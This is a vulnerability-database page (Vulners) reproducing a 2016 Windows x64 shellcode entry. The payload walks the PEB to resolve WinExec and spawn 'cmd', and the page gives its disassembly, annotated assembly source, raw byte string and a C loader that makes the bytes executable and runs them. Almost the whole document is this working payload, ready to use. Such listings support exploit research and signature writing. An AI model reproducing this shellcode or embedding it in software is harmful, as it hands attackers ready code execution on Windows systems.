Vulners
Lucene search
Windows/x64 - WinExec() Shellcode (93 bytes)
/*
# Title : Windows x64 WinExec() shellcode
# Date : 15-10-2016
# Author : Roziul Hasan Khan Shifat
# size : 93 bytes
# Tested on : Windows 7 Ultimate x64
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 99 cltd
1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
6: 48 8b 40 18 mov 0x18(%rax),%rax
a: 48 8b 70 10 mov 0x10(%rax),%rsi
e: 48 ad lods %ds:(%rsi),%rax
10: 48 8b 30 mov (%rax),%rsi
13: 48 8b 7e 30 mov 0x30(%rsi),%rdi
17: 48 31 db xor %rbx,%rbx
1a: 48 31 f6 xor %rsi,%rsi
1d: 8b 5f 3c mov 0x3c(%rdi),%ebx
20: 48 01 fb add %rdi,%rbx
23: b2 88 mov $0x88,%dl
25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 73 1c mov 0x1c(%rbx),%esi
2e: 48 01 fe add %rdi,%rsi
31: 99 cltd
32: 66 ba 27 05 mov $0x527,%dx
36: 8b 04 96 mov (%rsi,%rdx,4),%eax
39: 48 01 f8 add %rdi,%rax
3c: eb 17 jmp 55 <c>
000000000000003e <exec>:
3e: 59 pop %rcx
3f: 99 cltd
40: 48 ff c2 inc %rdx
43: ff d0 callq *%rax
45: 99 cltd
46: 66 ba 29 01 mov $0x129,%dx
4a: 8b 04 96 mov (%rsi,%rdx,4),%eax
4d: 48 01 f8 add %rdi,%rax
50: 48 31 c9 xor %rcx,%rcx
53: ff d0 callq *%rax
0000000000000055 <c>:
55: e8 e4 ff ff ff callq 3e <exec>
5a: 63 6d 64 movslq 0x64(%rbp),%ebp
...
*/
/*
bits 64
section .text
global _start
_start:
cdq
mov rax,[gs:rdx+0x60] ;PEB
mov rax,[rax+0x18] ;PEB.Ldr
mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
xor rbx,rbx
xor rsi,rsi
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi ;PE HEADER
mov dl,0x88
mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov esi,[rbx+0x1c] ;AddressOfFunctions
add rsi,rdi
cdq
mov dx,1319 ;Ordinal of WinExec()
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=WinExec()
;WinExec("cmd",1)
jmp c
exec:
pop rcx
cdq
inc rdx
call rax
cdq
mov dx,297
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=FatalExit()
;FatalExit(0)
xor rcx,rcx
call rax
c:
call exec
db 'cmd',0,0
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64";
main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length %d bytes\n",len );
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode ) ();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2016 00:00Current
7.1High risk
Vulners AI Score7.1